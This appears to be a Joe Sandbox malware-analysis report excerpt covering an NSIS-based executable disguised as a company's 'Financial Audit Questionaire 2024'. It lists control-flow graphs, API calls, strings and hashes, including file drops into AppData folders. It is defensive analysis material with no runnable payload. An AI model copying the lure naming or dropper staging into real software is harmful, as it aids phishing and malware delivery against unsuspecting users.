                                                                                                    control_flow_graph 745 401752-401777 call 402b3a call 405a4e 750 401781-401793 call 405f8c call 4059d7 lstrcatW 745->750 751 401779-40177f call 405f8c 745->751 756 401798-401799 call 406220 750->756 751->756 760 40179e-4017a2 756->760 761 4017a4-4017ae call 4062cf 760->761 762 4017d5-4017d8 760->762 770 4017c0-4017d2 761->770 771 4017b0-4017be CompareFileTime 761->771 764 4017e0-4017fc call 405bf8 762->764 765 4017da-4017db call 405bd3 762->765 772 401870-401899 call 405234 call 403062 764->772 773 4017fe-401801 764->773 765->764 770->762 771->770 787 4018a1-4018ad SetFileTime 772->787 788 40189b-40189f 772->788 774 401852-40185c call 405234 773->774 775 401803-401841 call 405f8c * 2 call 405fae call 405f8c call 405768 773->775 785 401865-40186b 774->785 775->760 807 401847-401848 775->807 789 4029d0 785->789 791 4018b3-4018be CloseHandle 787->791 788->787 788->791 794 4029d2-4029d6 789->794 792 4018c4-4018c7 791->792 793 4029c7-4029ca 791->793 796 4018c9-4018da call 405fae lstrcatW 792->796 797 4018dc-4018df call 405fae 792->797 793->789 803 4018e4-402243 call 405768 796->803 797->803 803->794 807->785 809 40184a-40184b 807->809 809->774
                                                                                                    APIs
                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\incontemptible\koput\Photoxylography145,?,?,00000031), ref: 00401793
                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\incontemptible\koput\Photoxylography145,?,?,00000031), ref: 004017B8
                                                                                                      • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                      • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll), ref: 004052A1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp$C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll$C:\Users\user\AppData\Roaming\incontemptible\koput\Photoxylography145$Call
                                                                                                    • API String ID: 1941528284-3665930131
                                                                                                    • Opcode ID: 604e78bc53d106bf4f0f62d85c02bc11bcf8d6cf611c9ccab56a67e3bf51c5d9
                                                                                                    • Instruction ID: 76b650aa9cc6b75c6122964d1cb95a98820e0ebeeaa58c8a998697c6af8370a7
                                                                                                    • Opcode Fuzzy Hash: 604e78bc53d106bf4f0f62d85c02bc11bcf8d6cf611c9ccab56a67e3bf51c5d9
                                                                                                    • Instruction Fuzzy Hash: 6A41A371904509BACF117BB5CC45DAF36B9EF05368F20423BF421B21E1D73C8A419A6E
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,00425738,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,00405B28,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,?,76232EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 004062DA
                                                                                                    • FindClose.KERNEL32(00000000), ref: 004062E6
                                                                                                    Strings
                                                                                                    • 8WB, xrefs: 004062D0
                                                                                                    • C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp, xrefs: 004062CF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID: 8WB$C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp
                                                                                                    • API String ID: 2295610775-1959562704
                                                                                                    • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                    • Instruction ID: 1ee065d6e3812395a970a313fce2833205c85b6b9f4a8d8b1e1fbb38817291b4
                                                                                                    • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                    • Instruction Fuzzy Hash: BED0123198A030EBC20067786D0CC4B7A989B553317514ABAF426F63E0C7389C65969D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                                                                    • Instruction ID: de185f48d860fff5590de95dd02018db6e9577308a0edf9c34ceb3d093010d57
                                                                                                    • Opcode Fuzzy Hash: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                                                                    • Instruction Fuzzy Hash: A7F18870D00269CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406308
                                                                                                    • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 00406313
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 310444273-0
                                                                                                    • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                    • Instruction ID: 0f2d4e1e99ce60b709eb5bed4958ea521979334ca76cdededd91ec650e447dd0
                                                                                                    • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                    • Instruction Fuzzy Hash: D5E0C236A08120ABC7124B209D48D6B77ACEFE9601305043AF906F6281D774AC229BE9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 178 403e73-403e88 175->178 179 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->179 176->175 177 403ce6-403cef 176->177 180 403cf1-403cfe SetWindowPos 177->180 181 403d04-403d07 177->181 183 403ec8-403ecd call 4041e6 178->183 184 403e8a-403e8d 178->184 179->178 180->181 186 403d21-403d27 181->186 187 403d09-403d1b ShowWindow 181->187 192 403ed2-403eed 183->192 189 403ec0-403ec2 184->189 190 403e8f-403e9a call 401389 184->190 193 403d43-403d46 186->193 194 403d29-403d3e DestroyWindow 186->194 187->186 189->183 191 404167 189->191 190->189 211 403e9c-403ebb SendMessageW 190->211 199 404169-404170 191->199 197 403ef6-403efc 192->197 198 403eef-403ef1 call 40140b 192->198 202 403d48-403d54 SetWindowLongW 193->202 203 403d59-403d5f 193->203 200 404144-40414a 194->200 207 403f02-403f0d 197->207 208 404125-40413e DestroyWindow EndDialog 197->208 198->197 200->191 205 40414c-404152 200->205 202->199 209 403e02-403e10 call 404201 203->209 210 403d65-403d76 GetDlgItem 203->210 205->191 213 404154-40415d ShowWindow 205->213 207->208 214 403f13-403f60 call 405fae call 40419a * 3 GetDlgItem 207->214 208->200 209->199 215 403d95-403d98 210->215 216 403d78-403d8f SendMessageW IsWindowEnabled 210->216 211->199 213->191 244 403f62-403f67 214->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 214->245 219 403d9a-403d9b 215->219 220 403d9d-403da0 215->220 216->191 216->215 221 403dcb-403dd0 call 404173 219->221 222 403da2-403da8 220->222 223 403dae-403db3 220->223 221->209 225 403de9-403dfc SendMessageW 222->225 226 403daa-403dac 222->226 223->225 227 403db5-403dbb 223->227 225->209 226->221 230 403dd2-403ddb call 40140b 227->230 231 403dbd-403dc3 call 40140b 227->231 230->209 241 403ddd-403de7 230->241 240 403dc9 231->240 240->221 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f8c lstrlenW call 405fae SetWindowTextW call 401389 251->253 252->253 253->192 262 40403a-40403c 253->262 262->192 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->200 267 40407f-4040ac CreateDialogParamW 264->267 265->191 266 404054-40405a 265->266 266->192 268 404060 266->268 267->200 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->191 269->191 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->200
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                                                                    • ShowWindow.USER32(?), ref: 00403D1B
                                                                                                    • DestroyWindow.USER32 ref: 00403D2F
                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403E35
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                                                                    • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403EAA
                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F9E
                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403FB4
                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403FD3
                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                                                                    • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                                                                    • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                    • String ID: &B
                                                                                                    • API String ID: 3282139019-3208460036
                                                                                                    • Opcode ID: d331890cd791021983203c44155cc69af11bbce5f8b1e17c8e6a12c02c090248
                                                                                                    • Instruction ID: 96835d82c370a0a6a0181c3c86cda1860f3d4ae5ef3a20f552a9e9ef927ba2a4
                                                                                                    • Opcode Fuzzy Hash: d331890cd791021983203c44155cc69af11bbce5f8b1e17c8e6a12c02c090248
                                                                                                    • Instruction Fuzzy Hash: DEC1B371A04200BBDB206F61ED49E3B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 277 40391f-403937 call 4062f6 280 403939-403949 call 405ed3 277->280 281 40394b-403982 call 405e59 277->281 290 4039a5-4039ce call 403bf5 call 405adf 280->290 286 403984-403995 call 405e59 281->286 287 40399a-4039a0 lstrcatW 281->287 286->287 287->290 295 403a60-403a68 call 405adf 290->295 296 4039d4-4039d9 290->296 302 403a76-403a9b LoadImageW 295->302 303 403a6a-403a71 call 405fae 295->303 296->295 297 4039df-403a07 call 405e59 296->297 297->295 304 403a09-403a0d 297->304 306 403b1c-403b24 call 40140b 302->306 307 403a9d-403acd RegisterClassW 302->307 303->302 308 403a1f-403a2b lstrlenW 304->308 309 403a0f-403a1c call 405a04 304->309 318 403b26-403b29 306->318 319 403b2e-403b39 call 403bf5 306->319 310 403ad3-403b17 SystemParametersInfoW CreateWindowExW 307->310 311 403beb 307->311 315 403a53-403a5b call 4059d7 call 405f8c 308->315 316 403a2d-403a3b lstrcmpiW 308->316 309->308 310->306 313 403bed-403bf4 311->313 315->295 316->315 322 403a3d-403a47 GetFileAttributesW 316->322 318->313 330 403bc2-403bc3 call 405307 319->330 331 403b3f-403b5c ShowWindow LoadLibraryW 319->331 325 403a49-403a4b 322->325 326 403a4d-403a4e call 405a23 322->326 325->315 325->326 326->315 337 403bc8-403bca 330->337 332 403b65-403b77 GetClassInfoW 331->332 333 403b5e-403b63 LoadLibraryW 331->333 335 403b79-403b89 GetClassInfoW RegisterClassW 332->335 336 403b8f-403bb2 DialogBoxParamW call 40140b 332->336 333->332 335->336 343 403bb7-403bc0 call 40386f 336->343 338 403be4-403be6 call 40140b 337->338 339 403bcc-403bd2 337->339 338->311 339->318 341 403bd8-403bdf call 40140b 339->341 341->318 343->313
                                                                                                    APIs
                                                                                                      • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406308
                                                                                                      • Part of subcall function 004062F6: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 00406313
                                                                                                      • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                    • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,00000000,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"), ref: 004039A0
                                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\incontemptible\koput,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\incontemptible\koput,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\incontemptible\koput), ref: 00403A87
                                                                                                      • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                    • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                                                                    • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\incontemptible\koput$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                                    • API String ID: 914957316-1992507233
                                                                                                    • Opcode ID: 3fe1317be8225d5207d3262feaceadd220e403ae806b79703d05bab37dc2ed14
                                                                                                    • Instruction ID: fe5ebf8e7a3d3daaf9cbba1b4cb9a1e73201f421c795aceacce4267b8607b26b
                                                                                                    • Opcode Fuzzy Hash: 3fe1317be8225d5207d3262feaceadd220e403ae806b79703d05bab37dc2ed14
                                                                                                    • Instruction Fuzzy Hash: EB61A370644200BED720AF669C46F2B3A6CEB84749F40453FF945B62E2D7786902CA3E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 348 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bf8 351 402e16-402e44 call 405f8c call 405a23 call 405f8c GetFileSize 348->351 352 402e0c-402e11 348->352 360 402f34-402f42 call 402d1a 351->360 361 402e4a-402e61 351->361 353 40305b-40305f 352->353 368 403013-403018 360->368 369 402f48-402f4b 360->369 362 402e63 361->362 363 402e65-402e72 call 4032f9 361->363 362->363 370 402e78-402e7e 363->370 371 402fcf-402fd7 call 402d1a 363->371 368->353 372 402f77-402fc3 GlobalAlloc call 406412 call 405c27 CreateFileW 369->372 373 402f4d-402f65 call 40330f call 4032f9 369->373 374 402e80-402e98 call 405bb3 370->374 375 402efe-402f02 370->375 371->368 399 402fc5-402fca 372->399 400 402fd9-403009 call 40330f call 403062 372->400 373->368 396 402f6b-402f71 373->396 381 402f0b-402f11 374->381 394 402e9a-402ea1 374->394 380 402f04-402f0a call 402d1a 375->380 375->381 380->381 387 402f13-402f21 call 4063a4 381->387 388 402f24-402f2e 381->388 387->388 388->360 388->361 394->381 398 402ea3-402eaa 394->398 396->368 396->372 398->381 401 402eac-402eb3 398->401 399->353 407 40300e-403011 400->407 401->381 403 402eb5-402ebc 401->403 403->381 406 402ebe-402ede 403->406 406->368 408 402ee4-402ee8 406->408 407->368 409 40301a-40302b 407->409 410 402ef0-402ef8 408->410 411 402eea-402eee 408->411 413 403033-403038 409->413 414 40302d 409->414 410->381 412 402efa-402efc 410->412 411->360 411->410 412->381 415 403039-40303f 413->415 414->413 415->415 416 403041-403059 call 405bb3 415->416 416->353
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,00000400), ref: 00402DEC
                                                                                                      • Part of subcall function 00405BF8: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,80000000,00000003), ref: 00405BFC
                                                                                                      • Part of subcall function 00405BF8: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,80000000,00000003), ref: 00402E35
                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC9, 00402F94
                                                                                                    • Inst, xrefs: 00402EA3
                                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                    • Null, xrefs: 00402EB5
                                                                                                    • C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, xrefs: 00402DD6, 00402DE5, 00402DF9, 00402E16
